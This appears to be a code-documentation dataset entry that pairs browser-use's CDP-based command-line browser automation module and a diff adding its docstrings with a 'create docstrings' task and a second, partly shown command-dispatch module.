raise RuntimeError(f'Failed to attach to target {target_id}')
# Enable required domains
await client.send.Page.enable(session_id=session_id)
await client.send.Runtime.enable(session_id=session_id)
try:
yield LightCDP(client=client, session_id=session_id, target_id=target_id)
finally:
try:
await client.stop()
except Exception:
pass
# ---------------------------------------------------------------------------
# Tier 2: Full BrowserSession (for state + first-time open)
# ---------------------------------------------------------------------------
async def _activate_content_target(session: 'BrowserSession', saved_target_id: str | None) -> None:
current_url = await session.get_current_page_url()
if current_url and current_url.startswith(('http://', 'https://')):
return
if saved_target_id and session.session_manager:
target = session.session_manager.get_target(saved_target_id)
if target and target.url and target.url.startswith(('http://', 'https://')):
try:
await session.get_or_create_cdp_session(saved_target_id, focus=True)
return
except (ValueError, Exception):
pass
if session._cdp_client_root:
targets_result = await session._cdp_client_root.send.Target.getTargets()
for t in targets_result.get('targetInfos', []):
if t.get('type') == 'page' and t.get('url', '').startswith(('http://', 'https://')):
try:
await session.get_or_create_cdp_session(t['targetId'], focus=True)
return
except (ValueError, Exception):
pass
@asynccontextmanager
async def browser(use_remote: bool = False):
from browser_use.browser.session import BrowserSession
state = _load_state()
cdp_url = state.get('cdp_url')
session = None
if cdp_url:
session = BrowserSession(cdp_url=cdp_url)
try:
await session.start()
await _activate_content_target(session, state.get('target_id'))
except Exception:
_clear_state()
session = None
if session is None:
if use_remote:
session = BrowserSession(use_cloud=True)
else:
session = BrowserSession(headless=False)
await session.start()
assert session.cdp_url is not None
_save_state({'cdp_url': session.cdp_url, 'remote': use_remote})
try:
yield session
finally:
if session.agent_focus_target_id:
current_state = _load_state()
current_state['target_id'] = session.agent_focus_target_id
_save_state(current_state)
if session._cdp_client_root:
try:
await session._cdp_client_root.stop()
except Exception:
pass
await session.event_bus.stop(clear=True, timeout=2)
# ---------------------------------------------------------------------------
# Lightweight CDP command functions (Tier 1)
# ---------------------------------------------------------------------------
async def _cdp_navigate(cdp: LightCDP, url: str) -> None:
await cdp.client.send.Page.navigate(params={'url': url}, session_id=cdp.session_id)
# Invalidate selector cache — page changed, elements are gone
state = _load_state()
state.pop('selector_map', None)
_save_state(state)
async def _cdp_screenshot(cdp: LightCDP, path: str | None) -> None:
result = await cdp.client.send.Page.captureScreenshot(params={'format': 'png'}, session_id=cdp.session_id)
data = base64.b64decode(result['data'])
if path:
p = Path(path)
p.write_bytes(data) # noqa: ASYNC240
print(f'Screenshot saved to {p} ({len(data)} bytes)')
else:
# Get viewport dimensions
metrics = await cdp.client.send.Page.getLayoutMetrics(session_id=cdp.session_id)
visual = metrics.get('visualViewport', {})
output: dict[str, Any] = {
'screenshot': result['data'],
'size_bytes': len(data),
}
if visual:
output['viewport'] = {
'width': int(visual.get('clientWidth', 0)),
'height': int(visual.get('clientHeight', 0)),
}
print(json.dumps(output))
async def _cdp_click_coordinate(cdp: LightCDP, x: int, y: int) -> None:
sid = cdp.session_id
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mouseMoved', 'x': x, 'y': y},
session_id=sid,
)
await asyncio.sleep(0.05)
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mousePressed', 'x': x, 'y': y, 'button': 'left', 'clickCount': 1},
session_id=sid,
)
await asyncio.sleep(0.05)
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mouseReleased', 'x': x, 'y': y, 'button': 'left', 'clickCount': 1},
session_id=sid,
)
async def _get_scroll_offset(cdp: LightCDP) -> tuple[float, float]:
result = await cdp.client.send.Runtime.evaluate(
params={
'expression': 'JSON.stringify({x:window.scrollX,y:window.scrollY})',
'returnByValue': True,
},
session_id=cdp.session_id,
)
data = json.loads(result.get('result', {}).get('value', '{"x":0,"y":0}'))
return (data['x'], data['y'])
async def _cdp_click_index(cdp: LightCDP, index: int) -> None:
cache = _load_selector_cache()
if index not in cache:
print(f'Error: Element index {index} not in cache. Run "state" first.', file=sys.stderr)
sys.exit(1)
elem = cache[index]
scroll_x, scroll_y = await _get_scroll_offset(cdp)
# Center of element in document coords, converted to viewport coords
viewport_x = int(elem['x'] + elem['w'] / 2 - scroll_x)
viewport_y = int(elem['y'] + elem['h'] / 2 - scroll_y)
await _cdp_click_coordinate(cdp, viewport_x, viewport_y)
tag = elem.get('tag', '')
text = elem.get('text', '')
label = f'{tag}' + (f' "{text}"' if text else '')
print(f'Clicked element [{index}] {label} at ({viewport_x}, {viewport_y})')
async def _cdp_type(cdp: LightCDP, text: str) -> None:
await cdp.client.send.Input.insertText(params={'text': text}, session_id=cdp.session_id)
async def _cdp_input(cdp: LightCDP, index: int, text: str) -> None:
await _cdp_click_index(cdp, index)
await asyncio.sleep(0.1)
await _cdp_type(cdp, text)
print(f'Typed "{text}" into element [{index}]')
async def _cdp_scroll(cdp: LightCDP, direction: str) -> None:
amount = -500 if direction == 'up' else 500
await cdp.client.send.Runtime.evaluate(
params={
'expression': f'window.scrollBy(0, {amount})',
'returnByValue': True,
},
session_id=cdp.session_id,
)
async def _cdp_back(cdp: LightCDP) -> None:
nav = await cdp.client.send.Page.getNavigationHistory(session_id=cdp.session_id)
current_index = nav.get('currentIndex', 0)
entries = nav.get('entries', [])
if current_index > 0:
prev_entry = entries[current_index - 1]
await cdp.client.send.Page.navigateToHistoryEntry(params={'entryId': prev_entry['id']}, session_id=cdp.session_id)
# Invalidate selector cache on navigation
state = _load_state()
state.pop('selector_map', None)
_save_state(state)
else:
print('Already at the beginning of history', file=sys.stderr)
async def _cdp_keys(cdp: LightCDP, keys_str: str) -> None:
from browser_use.actor.utils import get_key_info
# Key alias normalization (same as default_action_watchdog)
key_aliases = {
'ctrl': 'Control',
'control': 'Control',
'alt': 'Alt',
'option': 'Alt',
'meta': 'Meta',
'cmd': 'Meta',
'command': 'Meta',
'shift': 'Shift',
'enter': 'Enter',
'return': 'Enter',
'tab': 'Tab',
'delete': 'Delete',
'backspace': 'Backspace',
'escape': 'Escape',
'esc': 'Escape',
'space': ' ',
'up': 'ArrowUp',
'down': 'ArrowDown',
'left': 'ArrowLeft',
'right': 'ArrowRight',
'pageup': 'PageUp',
'pagedown': 'PageDown',
'home': 'Home',
'end': 'End',
}
sid = cdp.session_id
async def dispatch_key(event_type: str, key: str, modifiers: int = 0) -> None:
from cdp_use.cdp.input.commands import DispatchKeyEventParameters
code, vk_code = get_key_info(key)
params: DispatchKeyEventParameters = {'type': event_type, 'key': key, 'code': code}
if modifiers:
params['modifiers'] = modifiers
if vk_code is not None:
params['windowsVirtualKeyCode'] = vk_code
await cdp.client.send.Input.dispatchKeyEvent(params=params, session_id=sid)
# Normalize
if '+' in keys_str:
parts = [key_aliases.get(p.strip().lower(), p.strip()) for p in keys_str.split('+')]
modifiers_list = parts[:-1]
main_key = parts[-1]
modifier_map = {'Alt': 1, 'Control': 2, 'Meta': 4, 'Shift': 8}
modifier_value = 0
for mod in modifiers_list:
modifier_value |= modifier_map.get(mod, 0)
for mod in modifiers_list:
await dispatch_key('keyDown', mod)
await dispatch_key('keyDown', main_key, modifier_value)
await dispatch_key('keyUp', main_key, modifier_value)
for mod in reversed(modifiers_list):
await dispatch_key('keyUp', mod)
else:
normalized = key_aliases.get(keys_str.strip().lower(), keys_str)
special_keys = {
'Enter',
'Tab',
'Delete',
'Backspace',
'Escape',
'ArrowUp',
'ArrowDown',
'ArrowLeft',
'ArrowRight',
'PageUp',
'PageDown',
'Home',
'End',
'Control',
'Alt',
'Meta',
'Shift',
'F1',
'F2',
'F3',
'F4',
'F5',
'F6',
'F7',
'F8',
'F9',
'F10',
'F11',
'F12',
}
if normalized in special_keys:
await dispatch_key('keyDown', normalized)
if normalized == 'Enter':
await cdp.client.send.Input.dispatchKeyEvent(
params={'type': 'char', 'text': '\r', 'key': 'Enter'},
session_id=sid,
)
await dispatch_key('keyUp', normalized)
else:
# Plain text — use insertText for each character
for char in normalized:
await cdp.client.send.Input.insertText(
params={'text': char},
session_id=sid,
)
async def _cdp_html(cdp: LightCDP, selector: str | None) -> None:
if selector:
js = f'(function(){{ const el = document.querySelector({json.dumps(selector)}); return el ? el.outerHTML : null; }})()'
else:
js = 'document.documentElement.outerHTML'
result = await cdp.client.send.Runtime.evaluate(params={'expression': js, 'returnByValue': True}, session_id=cdp.session_id)
html = result.get('result', {}).get('value')
if html:
print(html)
else:
msg = f'No element found for selector: {selector}' if selector else 'Error: Could not get HTML'
print(msg, file=sys.stderr)
sys.exit(1)
async def _cdp_eval(cdp: LightCDP, js: str) -> None:
result = await cdp.client.send.Runtime.evaluate(params={'expression': js, 'returnByValue': True}, session_id=cdp.session_id)
value = result.get('result', {}).get('value')
print(json.dumps(value) if value is not None else 'undefined')
# ---------------------------------------------------------------------------
# Command routing
# ---------------------------------------------------------------------------
# Commands that always use lightweight CDP (Tier 1)
_LIGHTWEIGHT_COMMANDS = frozenset(
{
'screenshot',
'click',
'type',
'input',
'scroll',
'back',
'keys',
'html',
'eval',
}
)
async def main() -> int:
args = sys.argv[1:]
if not args or args[0] in ('help', '--help', '-h'):
print("""Usage: python -m browser_use.skill_cli.direct <command> [args]
Commands:
open <url> Navigate to URL
state Get DOM state with viewport info
click <index> Click element by index (uses cached positions)
click <x> <y> Click at viewport coordinates
type <text> Type into focused element
input <index> <text> Click element then type
screenshot [path] Take screenshot (saves to file or prints base64+dimensions)
scroll [up|down] Scroll page (default: down)
back Go back in history
keys <keys> Send keyboard keys
html [selector] Get raw HTML (full page or CSS selector)
eval <js> Execute JavaScript
close Kill browser and clean up
Flags:
--remote Use browser-use cloud browser (requires BROWSER_USE_API_KEY)""")
return 0 if args else 1
# Extract --remote flag
use_remote = '--remote' in args
args = [a for a in args if a != '--remote']
if not args:
print('Error: No command specified', file=sys.stderr)
return 1
command = args[0]
# ── close: lightweight CDP kill ──────────────────────────────────────
if command == 'close':
state = _load_state()
cdp_url = state.get('cdp_url')
if not cdp_url:
print('No active browser session')
else:
closed = False
try:
from cdp_use import CDPClient
client = CDPClient(cdp_url)
await client.start()
await client.send.Browser.close()
await client.stop()
closed = True
except Exception:
pass
if not closed:
try:
from browser_use.browser.session import BrowserSession
session = BrowserSession(cdp_url=cdp_url)
await session.start()
await session.kill()
except Exception:
pass
_clear_state()
print('Browser closed')
return 0
# ── open: lightweight if reconnecting, full session if first launch ──
if command == 'open' and len(args) >= 2:
url = args[1]
if not url.startswith(('http://', 'https://', 'file://')):
url = 'https://' + url
state = _load_state()
if state.get('cdp_url'):
# Reconnect — lightweight CDP navigate
try:
async with _lightweight_cdp() as cdp:
await _cdp_navigate(cdp, url)
# Update target_id in state
current_state = _load_state()
current_state['target_id'] = cdp.target_id
_save_state(current_state)
print(f'Navigated to: {url}')
return 0
except RuntimeError:
# Browser died — fall through to full session launch
_clear_state()
# First launch — needs full session
async with browser(use_remote=use_remote) as session:
from browser_use.browser.events import NavigateToUrlEvent
await session.event_bus.dispatch(NavigateToUrlEvent(url=url))
if session.agent_focus_target_id:
current_state = _load_state()
current_state['target_id'] = session.agent_focus_target_id
_save_state(current_state)
print(f'Navigated to: {url}')
return 0
# ── state: full session (needs DOMWatchdog for DOM tree building) ────
if command == 'state':
async with browser(use_remote=use_remote) as session:
state_summary = await session.get_browser_state_summary()
assert state_summary.dom_state is not None
text = state_summary.dom_state.llm_representation()
if state_summary.page_info:
pi = state_summary.page_info
header = f'viewport: {pi.viewport_width}x{pi.viewport_height}\n'
header += f'page: {pi.page_width}x{pi.page_height}\n'
header += f'scroll: ({pi.scroll_x}, {pi.scroll_y})\n'
text = header + text
print(text)
# Cache selector map for subsequent click-by-index
selector_map = await session.get_selector_map()
if selector_map:
_save_selector_cache(selector_map)
return 0
# ── Lightweight commands (Tier 1) ────────────────────────────────────
if command in _LIGHTWEIGHT_COMMANDS:
try:
async with _lightweight_cdp() as cdp:
if command == 'screenshot':
path = args[1] if len(args) >= 2 else None
await _cdp_screenshot(cdp, path)
elif command == 'click' and len(args) >= 2:
int_args = [int(a) for a in args[1:]]
if len(int_args) == 2:
x, y = int_args
await _cdp_click_coordinate(cdp, x, y)
print(f'Clicked at ({x}, {y})')
elif len(int_args) == 1:
await _cdp_click_index(cdp, int_args[0])
else:
print('Usage: click <index> or click <x> <y>', file=sys.stderr)
return 1
elif command == 'type' and len(args) >= 2:
text = ' '.join(args[1:])
await _cdp_type(cdp, text)
print(f'Typed: {text}')
elif command == 'input' and len(args) >= 3:
index = int(args[1])
text = ' '.join(args[2:])
await _cdp_input(cdp, index, text)
elif command == 'scroll':
direction = args[1] if len(args) >= 2 else 'down'
await _cdp_scroll(cdp, direction)
print(f'Scrolled {direction}')
elif command == 'back':
await _cdp_back(cdp)
print('Navigated back')
elif command == 'keys' and len(args) >= 2:
await _cdp_keys(cdp, ' '.join(args[1:]))
print(f'Sent keys: {" ".join(args[1:])}')
elif command == 'html':
selector = args[1] if len(args) >= 2 else None
await _cdp_html(cdp, selector)
elif command == 'eval' and len(args) >= 2:
js = ' '.join(args[1:])
await _cdp_eval(cdp, js)
else:
print(f'Missing arguments for: {command}', file=sys.stderr)
return 1
except RuntimeError as e:
print(f'Error: {e}', file=sys.stderr)
return 1
return 0
print(f'Unknown command: {command}', file=sys.stderr)
return 1
if __name__ == '__main__':
sys.exit(asyncio.run(main())) | --- +++ @@ -1,3 +1,21 @@+"""Serverless CLI for browser-use - runs commands directly without a session server.
+
+Each command reconnects to the browser via CDP WebSocket URL saved to a state file.
+The browser process stays alive between commands; only the Python process exits.
+
+Two-tier reconnection:
+ Tier 1 (Lightweight CDP, ~200ms): Most commands use raw CDPClient + Target.attachToTarget.
+ No BrowserSession, no watchdogs, no event bus.
+ Tier 2 (Full BrowserSession, ~3s): Only for `state` (needs DOMWatchdog) and first-time
+ `open` (needs to launch browser).
+
+Usage:
+ python -m browser_use.skill_cli.direct open https://example.com
+ python -m browser_use.skill_cli.direct state
+ python -m browser_use.skill_cli.direct click 200 400
+ python -m browser_use.skill_cli.direct screenshot ./shot.png
+ python -m browser_use.skill_cli.direct close
+"""
import asyncio
import base64
@@ -44,6 +62,11 @@
def _save_selector_cache(selector_map: dict[int, Any]) -> None:
+ """Cache element positions from the selector map into the state file.
+
+ Stores absolute_position (document coordinates) so click-by-index can
+ convert to viewport coords at click time using current scroll offset.
+ """
cache: dict[str, dict[str, Any]] = {}
for idx, node in selector_map.items():
pos = getattr(node, 'absolute_position', None)
@@ -69,6 +92,7 @@
def _load_selector_cache() -> dict[int, dict[str, Any]]:
+ """Load cached element positions. Returns {index: {x, y, w, h, tag, text}}."""
state = _load_state()
raw = state.get('selector_map', {})
return {int(k): v for k, v in raw.items()}
@@ -81,6 +105,7 @@
@dataclass
class LightCDP:
+ """Minimal CDP connection — no BrowserSession, no watchdogs."""
client: 'CDPClient'
session_id: str
@@ -89,6 +114,10 @@
@asynccontextmanager
async def _lightweight_cdp():
+ """Connect to the browser via raw CDP. ~200ms total.
+
+ Raises RuntimeError if no saved state or browser is dead.
+ """
from cdp_use import CDPClient
state = _load_state()
@@ -141,6 +170,7 @@
async def _activate_content_target(session: 'BrowserSession', saved_target_id: str | None) -> None:
+ """After reconnection, ensure the session focuses on the actual page, not about:blank."""
current_url = await session.get_current_page_url()
if current_url and current_url.startswith(('http://', 'https://')):
return
@@ -167,6 +197,7 @@
@asynccontextmanager
async def browser(use_remote: bool = False):
+ """Connect to existing browser or launch a new one. Disconnects CDP on exit."""
from browser_use.browser.session import BrowserSession
state = _load_state()
@@ -212,6 +243,7 @@
async def _cdp_navigate(cdp: LightCDP, url: str) -> None:
+ """Navigate to URL and invalidate selector cache."""
await cdp.client.send.Page.navigate(params={'url': url}, session_id=cdp.session_id)
# Invalidate selector cache — page changed, elements are gone
state = _load_state()
@@ -220,6 +252,7 @@
async def _cdp_screenshot(cdp: LightCDP, path: str | None) -> None:
+ """Take screenshot, save to file or print base64+dimensions."""
result = await cdp.client.send.Page.captureScreenshot(params={'format': 'png'}, session_id=cdp.session_id)
data = base64.b64decode(result['data'])
@@ -244,6 +277,7 @@
async def _cdp_click_coordinate(cdp: LightCDP, x: int, y: int) -> None:
+ """Click at viewport coordinates using CDP Input.dispatchMouseEvent."""
sid = cdp.session_id
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mouseMoved', 'x': x, 'y': y},
@@ -262,6 +296,7 @@
async def _get_scroll_offset(cdp: LightCDP) -> tuple[float, float]:
+ """Get current scroll position via JS."""
result = await cdp.client.send.Runtime.evaluate(
params={
'expression': 'JSON.stringify({x:window.scrollX,y:window.scrollY})',
@@ -274,6 +309,7 @@
async def _cdp_click_index(cdp: LightCDP, index: int) -> None:
+ """Click element by cached index. Converts document coords to viewport coords."""
cache = _load_selector_cache()
if index not in cache:
print(f'Error: Element index {index} not in cache. Run "state" first.', file=sys.stderr)
@@ -294,10 +330,12 @@
async def _cdp_type(cdp: LightCDP, text: str) -> None:
+ """Type text into focused element."""
await cdp.client.send.Input.insertText(params={'text': text}, session_id=cdp.session_id)
async def _cdp_input(cdp: LightCDP, index: int, text: str) -> None:
+ """Click element by index then type text."""
await _cdp_click_index(cdp, index)
await asyncio.sleep(0.1)
await _cdp_type(cdp, text)
@@ -305,6 +343,7 @@
async def _cdp_scroll(cdp: LightCDP, direction: str) -> None:
+ """Scroll page up or down by 500px."""
amount = -500 if direction == 'up' else 500
await cdp.client.send.Runtime.evaluate(
params={
@@ -316,6 +355,7 @@
async def _cdp_back(cdp: LightCDP) -> None:
+ """Go back in browser history."""
nav = await cdp.client.send.Page.getNavigationHistory(session_id=cdp.session_id)
current_index = nav.get('currentIndex', 0)
entries = nav.get('entries', [])
@@ -331,6 +371,7 @@
async def _cdp_keys(cdp: LightCDP, keys_str: str) -> None:
+ """Send keyboard keys/shortcuts via CDP."""
from browser_use.actor.utils import get_key_info
# Key alias normalization (same as default_action_watchdog)
@@ -442,6 +483,7 @@
async def _cdp_html(cdp: LightCDP, selector: str | None) -> None:
+ """Get raw HTML of the page or a CSS selector."""
if selector:
js = f'(function(){{ const el = document.querySelector({json.dumps(selector)}); return el ? el.outerHTML : null; }})()'
else:
@@ -457,6 +499,7 @@
async def _cdp_eval(cdp: LightCDP, js: str) -> None:
+ """Execute JavaScript and print result."""
result = await cdp.client.send.Runtime.evaluate(params={'expression': js, 'returnByValue': True}, session_id=cdp.session_id)
value = result.get('result', {}).get('value')
print(json.dumps(value) if value is not None else 'undefined')
@@ -665,4 +708,4 @@
if __name__ == '__main__':
- sys.exit(asyncio.run(main()))+ sys.exit(asyncio.run(main()))
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/direct.py |
Create docstrings for each class method |
import asyncio
import base64
import logging
from pathlib import Path
from typing import Any
from browser_use.skill_cli.sessions import SessionInfo
logger = logging.getLogger(__name__)
# All skill-CLI sub-commands this module can dispatch via handle().
# Membership here is what marks an action as a "browser" command.
COMMANDS = {
    'open',
    'click',
    'type',
    'input',
    'scroll',
    'back',
    'screenshot',
    'state',
    'switch',
    'close-tab',
    'keys',
    'select',
    'eval',
    'extract',
    'cookies',
    'wait',
    'hover',
    'dblclick',
    'rightclick',
    'get',
}
async def _execute_js(session: SessionInfo, js: str) -> Any:
    """Evaluate a JavaScript expression in the focused page via CDP.

    Args:
        session: Wrapper holding the active browser session.
        js: JavaScript expression to evaluate.

    Returns:
        The JSON-serializable result value, or None when the expression
        produced no value.

    Raises:
        RuntimeError: If no CDP session could be obtained.
    """
    browser = session.browser_session
    # Reuse (or lazily create) a CDP session bound to the focused target.
    cdp = await browser.get_or_create_cdp_session(target_id=None, focus=False)
    if not cdp:
        raise RuntimeError('No active browser session')
    evaluation = await cdp.cdp_client.send.Runtime.evaluate(
        params={'expression': js, 'returnByValue': True},
        session_id=cdp.session_id,
    )
    outcome = evaluation.get('result', {})
    return outcome.get('value')
async def _get_element_center(session: SessionInfo, node: Any) -> tuple[float, float] | None:
    """Return the viewport center (x, y) of *node*, or None on any failure.

    Scrolls the element into view first so the returned coordinates are
    usable for synthetic mouse events. All errors are logged and reported
    as None rather than raised.
    """
    bs = session.browser_session
    try:
        cdp_session = await bs.cdp_client_for_node(node)
        session_id = cdp_session.session_id
        backend_node_id = node.backend_node_id
        # Scroll element into view first
        try:
            await cdp_session.cdp_client.send.DOM.scrollIntoViewIfNeeded(
                params={'backendNodeId': backend_node_id}, session_id=session_id
            )
            # Brief pause so layout settles before measuring coordinates.
            await asyncio.sleep(0.05)
        except Exception:
            # Best-effort: some nodes can't be scrolled; coordinates may still work.
            pass
        # Get element coordinates
        element_rect = await bs.get_element_coordinates(backend_node_id, cdp_session)
        if element_rect:
            center_x = element_rect.x + element_rect.width / 2
            center_y = element_rect.y + element_rect.height / 2
            return center_x, center_y
        return None
    except Exception as e:
        logger.error(f'Failed to get element center: {e}')
        return None
async def handle(action: str, session: SessionInfo, params: dict[str, Any]) -> Any:
    """Dispatch a single skill-CLI browser command against the live session.

    Args:
        action: Command name; expected to be one of COMMANDS.
        session: Wrapper holding the active BrowserSession.
        params: Parsed CLI parameters; required keys depend on the action.

    Returns:
        A JSON-serializable dict describing the outcome. Recoverable
        failures (bad index, missing tab, etc.) are reported as a dict
        with an 'error' key rather than raised.

    Raises:
        ValueError: If *action* is not a known browser command.
    """
    bs = session.browser_session

    if action == 'open':
        url = params['url']
        # Ensure URL has scheme
        if not url.startswith(('http://', 'https://', 'file://')):
            url = 'https://' + url
        from browser_use.browser.events import NavigateToUrlEvent

        await bs.event_bus.dispatch(NavigateToUrlEvent(url=url))
        result: dict[str, Any] = {'url': url}
        # Add live preview URL for cloud browsers
        if bs.browser_profile.use_cloud and bs.cdp_url:
            from urllib.parse import quote

            result['live_url'] = f'https://live.browser-use.com/?wss={quote(bs.cdp_url, safe="")}'
        return result

    elif action == 'click':
        args = params.get('args', [])
        if len(args) == 2:
            # Coordinate click: browser-use click <x> <y>
            from browser_use.browser.events import ClickCoordinateEvent

            x, y = args
            await bs.event_bus.dispatch(ClickCoordinateEvent(coordinate_x=x, coordinate_y=y))
            return {'clicked_coordinate': {'x': x, 'y': y}}
        elif len(args) == 1:
            # Index click: browser-use click <index>
            from browser_use.browser.events import ClickElementEvent

            index = args[0]
            node = await bs.get_element_by_index(index)
            if node is None:
                return {'error': f'Element index {index} not found - page may have changed'}
            await bs.event_bus.dispatch(ClickElementEvent(node=node))
            return {'clicked': index}
        else:
            return {'error': 'Usage: click <index> or click <x> <y>'}

    elif action == 'type':
        # Type into currently focused element using CDP directly
        text = params['text']
        cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
        if not cdp_session:
            return {'error': 'No active browser session'}
        await cdp_session.cdp_client.send.Input.insertText(
            params={'text': text},
            session_id=cdp_session.session_id,
        )
        return {'typed': text}

    elif action == 'input':
        from browser_use.browser.events import ClickElementEvent, TypeTextEvent

        index = params['index']
        text = params['text']
        # Look up node from selector map
        node = await bs.get_element_by_index(index)
        if node is None:
            return {'error': f'Element index {index} not found - page may have changed'}
        # Click to focus, then type into the element.
        await bs.event_bus.dispatch(ClickElementEvent(node=node))
        await bs.event_bus.dispatch(TypeTextEvent(node=node, text=text))
        return {'input': text, 'element': index}

    elif action == 'scroll':
        from browser_use.browser.events import ScrollEvent

        direction = params.get('direction', 'down')
        amount = params.get('amount', 500)
        await bs.event_bus.dispatch(ScrollEvent(direction=direction, amount=amount))
        return {'scrolled': direction, 'amount': amount}

    elif action == 'back':
        from browser_use.browser.events import GoBackEvent

        await bs.event_bus.dispatch(GoBackEvent())
        return {'back': True}

    elif action == 'screenshot':
        data = await bs.take_screenshot(full_page=params.get('full', False))
        if params.get('path'):
            path = Path(params['path'])
            path.write_bytes(data)
            return {'saved': str(path), 'size': len(data)}
        # Return base64 encoded
        return {'screenshot': base64.b64encode(data).decode(), 'size': len(data)}

    elif action == 'state':
        # Return the LLM representation with viewport info for coordinate clicking
        state = await bs.get_browser_state_summary()
        assert state.dom_state is not None
        state_text = state.dom_state.llm_representation()
        # Prepend viewport dimensions so LLMs know the coordinate space
        if state.page_info:
            pi = state.page_info
            viewport_text = f'viewport: {pi.viewport_width}x{pi.viewport_height}\n'
            viewport_text += f'page: {pi.page_width}x{pi.page_height}\n'
            viewport_text += f'scroll: ({pi.scroll_x}, {pi.scroll_y})\n'
            state_text = viewport_text + state_text
        return {'_raw_text': state_text}

    elif action == 'switch':
        from browser_use.browser.events import SwitchTabEvent

        tab_index = params['tab']
        # Get target_id from tab index
        page_targets = bs.session_manager.get_all_page_targets() if bs.session_manager else []
        if tab_index < 0 or tab_index >= len(page_targets):
            return {'error': f'Invalid tab index {tab_index}. Available: 0-{len(page_targets) - 1}'}
        target_id = page_targets[tab_index].target_id
        await bs.event_bus.dispatch(SwitchTabEvent(target_id=target_id))
        return {'switched': tab_index}

    elif action == 'close-tab':
        from browser_use.browser.events import CloseTabEvent

        tab_index = params.get('tab')
        # Get target_id from tab index
        page_targets = bs.session_manager.get_all_page_targets() if bs.session_manager else []
        if tab_index is not None:
            if tab_index < 0 or tab_index >= len(page_targets):
                return {'error': f'Invalid tab index {tab_index}. Available: 0-{len(page_targets) - 1}'}
            target_id = page_targets[tab_index].target_id
        else:
            # Close current/focused tab
            target_id = bs.session_manager.get_focused_target().target_id if bs.session_manager else None
            if not target_id:
                return {'error': 'No focused tab to close'}
        await bs.event_bus.dispatch(CloseTabEvent(target_id=target_id))
        # NOTE(review): tab_index may be None here (current tab) — callers see {'closed': None}.
        return {'closed': tab_index}

    elif action == 'keys':
        from browser_use.browser.events import SendKeysEvent

        keys = params['keys']
        await bs.event_bus.dispatch(SendKeysEvent(keys=keys))
        return {'sent': keys}

    elif action == 'select':
        from browser_use.browser.events import SelectDropdownOptionEvent

        index = params['index']
        value = params['value']
        # Look up node from selector map
        node = await bs.get_element_by_index(index)
        if node is None:
            return {'error': f'Element index {index} not found - page may have changed'}
        await bs.event_bus.dispatch(SelectDropdownOptionEvent(node=node, text=value))
        return {'selected': value, 'element': index}

    elif action == 'eval':
        js = params['js']
        # Execute JavaScript via CDP
        result = await _execute_js(session, js)
        return {'result': result}

    elif action == 'extract':
        query = params['query']
        # This requires LLM integration
        # For now, return a placeholder
        return {'query': query, 'error': 'extract requires agent mode - use: browser-use run "extract ..."'}

    elif action == 'hover':
        index = params['index']
        node = await bs.get_element_by_index(index)
        if node is None:
            return {'error': f'Element index {index} not found - page may have changed'}
        coords = await _get_element_center(session, node)
        if not coords:
            return {'error': 'Could not get element coordinates for hover'}
        center_x, center_y = coords
        cdp_session = await bs.cdp_client_for_node(node)
        # A bare mouseMoved event is enough to trigger hover styles/handlers.
        await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
            params={'type': 'mouseMoved', 'x': center_x, 'y': center_y},
            session_id=cdp_session.session_id,
        )
        return {'hovered': index}

    elif action == 'dblclick':
        index = params['index']
        node = await bs.get_element_by_index(index)
        if node is None:
            return {'error': f'Element index {index} not found - page may have changed'}
        coords = await _get_element_center(session, node)
        if not coords:
            return {'error': 'Could not get element coordinates for double-click'}
        center_x, center_y = coords
        cdp_session = await bs.cdp_client_for_node(node)
        session_id = cdp_session.session_id
        # Move mouse to element
        await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
            params={'type': 'mouseMoved', 'x': center_x, 'y': center_y},
            session_id=session_id,
        )
        await asyncio.sleep(0.05)
        # Double click (clickCount: 2)
        await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
            params={
                'type': 'mousePressed',
                'x': center_x,
                'y': center_y,
                'button': 'left',
                'clickCount': 2,
            },
            session_id=session_id,
        )
        await asyncio.sleep(0.05)
        await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
            params={
                'type': 'mouseReleased',
                'x': center_x,
                'y': center_y,
                'button': 'left',
                'clickCount': 2,
            },
            session_id=session_id,
        )
        return {'double_clicked': index}

    elif action == 'rightclick':
        index = params['index']
        node = await bs.get_element_by_index(index)
        if node is None:
            return {'error': f'Element index {index} not found - page may have changed'}
        coords = await _get_element_center(session, node)
        if not coords:
            return {'error': 'Could not get element coordinates for right-click'}
        center_x, center_y = coords
        cdp_session = await bs.cdp_client_for_node(node)
        session_id = cdp_session.session_id
        # Move mouse to element
        await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
            params={'type': 'mouseMoved', 'x': center_x, 'y': center_y},
            session_id=session_id,
        )
        await asyncio.sleep(0.05)
        # Right click (button: 'right')
        await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
            params={
                'type': 'mousePressed',
                'x': center_x,
                'y': center_y,
                'button': 'right',
                'clickCount': 1,
            },
            session_id=session_id,
        )
        await asyncio.sleep(0.05)
        await cdp_session.cdp_client.send.Input.dispatchMouseEvent(
            params={
                'type': 'mouseReleased',
                'x': center_x,
                'y': center_y,
                'button': 'right',
                'clickCount': 1,
            },
            session_id=session_id,
        )
        return {'right_clicked': index}

    elif action == 'cookies':
        cookies_command = params.get('cookies_command')
        if cookies_command == 'get':
            # Get cookies via direct CDP
            cookies = await bs._cdp_get_cookies()
            # Convert Cookie objects to dicts
            cookie_list: list[dict[str, Any]] = []
            for c in cookies:
                cookie_dict: dict[str, Any] = {
                    'name': c.get('name', ''),
                    'value': c.get('value', ''),
                    'domain': c.get('domain', ''),
                    'path': c.get('path', '/'),
                    'secure': c.get('secure', False),
                    'httpOnly': c.get('httpOnly', False),
                }
                if 'sameSite' in c:
                    cookie_dict['sameSite'] = c.get('sameSite')
                if 'expires' in c:
                    cookie_dict['expires'] = c.get('expires')
                cookie_list.append(cookie_dict)
            # Filter by URL if provided
            url = params.get('url')
            if url:
                from urllib.parse import urlparse

                parsed = urlparse(url)
                domain = parsed.netloc
                # Match either direction so both parent and subdomain cookies pass.
                cookie_list = [
                    c
                    for c in cookie_list
                    if domain.endswith(str(c.get('domain', '')).lstrip('.'))
                    or str(c.get('domain', '')).lstrip('.').endswith(domain)
